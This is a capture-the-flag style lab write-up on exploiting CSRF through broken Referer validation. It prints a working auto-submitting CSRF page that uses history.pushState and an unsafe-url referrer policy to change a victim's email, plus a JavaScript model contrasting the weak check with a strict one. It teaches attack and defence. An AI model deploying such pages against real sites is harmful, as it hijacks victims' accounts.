
LAB 12 - CSRF with broken Referer validation

Initial instructions

This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

First, log in with the wiener:peter credentials, submit the email-change form from the account page and intercept the resulting POST request with Burp Suite.


Next, I generate a CSRF PoC from the intercepted request in Burp Suite.


Before hosting the PoC on the exploit server, one change is needed. The lab only checks that the Referer header contains the lab's domain somewhere in its value, not that the request actually originated from the lab. We can satisfy that check by making the exploit page's own URL contain the lab domain: edit the generated history.pushState call so the lab domain becomes part of the path (the browser will then report that URL as the Referer of the form submission).

history.pushState('', '', '/YOUR-LAB-ID.web-security-academy.net');

The finished PoC should look similar to this:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <head>
    <!-- Send the full URL, not just the origin, in the Referer header -->
    <meta name="referrer" content="unsafe-url">
  </head>
  <body>
    <form action="https://0a7a0048031a31b481c87faf00310080.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="bomboclat@bomboclat.xyz" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Put the lab domain in this page's URL so the Referer contains it
      history.pushState('', '', '/0a7a0048031a31b481c87faf00310080.web-security-academy.net');
      document.forms[0].submit();
    </script>
  </body>
</html>

Now host the page on the exploit server and deliver it to the victim. The meta referrer tag in the head section (meta name="referrer" content="unsafe-url") is essential. Under the default referrer policy (strict-origin-when-cross-origin) browsers send only the origin of the exploit page in the Referer header for cross-origin requests and strip the path and query string, so the lab domain we injected with history.pushState would never reach the server and the check would fail. With unsafe-url the full URL of the exploit page is sent, the Referer contains the lab domain, and the broken validation accepts the request.
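The following is an added example, not code from the write-up or from the lab: it models the lab's weak "Referer contains the expected domain" check next to a strict host comparison, and models which Referer value a browser sends under the default referrer policy versus unsafe-url, so you can see why the history.pushState trick only works once the meta referrer tag is in place. The lab hostname is the one from the PoC above; the exploit-server hostname is a constructed placeholder.

```javascript
// Added example, not part of the write-up. Models the lab's weak Referer
// check beside a strict one, and the Referer a browser would send under two
// referrer policies. LAB_HOST is taken from the PoC above; EXPLOIT_HOST is a
// constructed placeholder.

const LAB_HOST = "0a7a0048031a31b481c87faf00310080.web-security-academy.net";
const EXPLOIT_HOST = "exploit-0a1b2c3d.exploit-server.net"; // constructed
const TARGET = `https://${LAB_HOST}/my-account/change-email`;

// Weak check (how the lab behaves): accept any Referer whose string merely
// contains the expected domain, wherever it appears in the value.
function weakRefererCheck(referer, expectedHost = LAB_HOST) {
  return typeof referer === "string" && referer.includes(expectedHost);
}

// Strict check: parse the Referer and compare scheme and host exactly.
// Fails closed on a missing or unparsable header.
function strictRefererCheck(referer, expectedHost = LAB_HOST) {
  if (typeof referer !== "string") return false;
  let url;
  try {
    url = new URL(referer);
  } catch {
    return false;
  }
  return url.protocol === "https:" && url.host === expectedHost;
}

// Referer a browser attaches to a request from `fromUrl` to `toUrl`.
// Simplified model of two policies:
//   strict-origin-when-cross-origin (the browser default): full URL for
//     same-origin requests, origin only for cross-origin requests, and no
//     Referer at all on an HTTPS -> HTTP downgrade.
//   unsafe-url (what the <meta name="referrer"> tag selects): full URL always.
// The fragment is never sent under either policy.
function refererFor(policy, fromUrl, toUrl) {
  const from = new URL(fromUrl);
  const to = new URL(toUrl);
  from.hash = "";
  if (policy === "unsafe-url") return from.href;
  if (policy === "strict-origin-when-cross-origin") {
    if (from.origin === to.origin) return from.href;
    if (from.protocol === "https:" && to.protocol === "http:") return undefined;
    return from.origin + "/";
  }
  throw new Error(`policy not modelled: ${policy}`);
}

// Outcome of the CSRF POST sent from `pageUrl` under `policy`, against both checks.
function csrfOutcome(policy, pageUrl) {
  const referer = refererFor(policy, pageUrl, TARGET);
  return {
    referer,
    weakAccepts: weakRefererCheck(referer),
    strictAccepts: strictRefererCheck(referer),
  };
}

// The exploit page's URL after history.pushState put the lab domain in its path.
const EXPLOIT_PAGE = `https://${EXPLOIT_HOST}/${LAB_HOST}`;

for (const policy of ["strict-origin-when-cross-origin", "unsafe-url"]) {
  console.log(policy, csrfOutcome(policy, EXPLOIT_PAGE));
}
// A legitimate same-origin form submission passes both checks.
console.log("legitimate", csrfOutcome("strict-origin-when-cross-origin", `https://${LAB_HOST}/my-account`));
```

Under the default policy the Referer is just https://exploit-0a1b2c3d.exploit-server.net/ and even the weak check rejects it; with unsafe-url the full path is sent and the weak check accepts it, while the strict check still rejects it because the host is the exploit server. The strict version also rejects lookalike hosts such as LAB_HOST.evil.example, which the substring check accepts.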


Congratulations, you solved the lab!